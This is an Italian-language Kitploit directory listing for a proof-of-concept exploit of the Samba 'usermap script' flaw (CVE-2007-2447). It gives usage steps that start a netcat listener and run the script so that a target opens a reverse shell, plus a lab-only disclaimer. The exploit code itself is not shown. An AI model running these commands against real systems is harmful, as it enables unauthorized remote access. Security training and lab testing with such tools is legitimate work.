Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2007-2447 — Exploit proof-of-concept per l'esecuzione remota di comandi tramite script usermap di Samba (CVE-2007-2447) con consegna del payload reverse shell per test di laboratorio educativi. | Kitploit
Strumenti/GitHubGitHub/abdulsaabir/cve-2007-2447
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso Remoto
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Exploit proof-of-concept per l'esecuzione remota di comandi tramite script usermap di Samba (CVE-2007-2447) con consegna del payload reverse shell per test di laboratorio educativi.

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2007-2447

PoC: Esecuzione di comandi remoti di Samba "usermap script" (CVE storico). Questo repository contiene un piccolo script proof-of-concept per ricerca e revisione educativa. Lo script principale è usermap_script_Command_Execution.py.

Riferimento writeup: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Utilizzo

Clona il repository ed esegui lo script in un laboratorio controllato. Il PoC utilizza opzionalmente una reverse shell verso LHOST:LPORT — avvia il tuo listener prima di eseguire lo script e assicurati che le dipendenze siano installate (vedi Installazione).

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

Parametri

  • RHOST — IP o hostname di destinazione
  • RPORT — porta TCP di destinazione (tipicamente 139)
  • LHOST — IP del listener per una connessione inversa
  • LPORT — porta del listener

Installazione

Consigliato: crea un ambiente virtuale Python isolato e installa le dipendenze da requirements.txt prima di eseguire lo script.

root@kitploit:~
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt

Sicurezza e Disclaimer

Questo codice è fornito esclusivamente per ricerca legittima sulla sicurezza, educazione e test difensivi. Non eseguire questo script contro alcun sistema che non possiedi o per cui non hai esplicita autorizzazione scritta. L'uso improprio può portare a conseguenze legali; il proprietario del repository non è responsabile per uso improprio.

Preferisci sempre la revisione statica del codice e il test in laboratorio controllato (snapshot di VM, reti isolate e catture di pacchetti) quando analizzi codice potenzialmente pericoloso.

Se desideri una guida annotata non eseguibile o un requirements.txt, apri una segnalazione o richiedilo qui.

Scarica lo strumento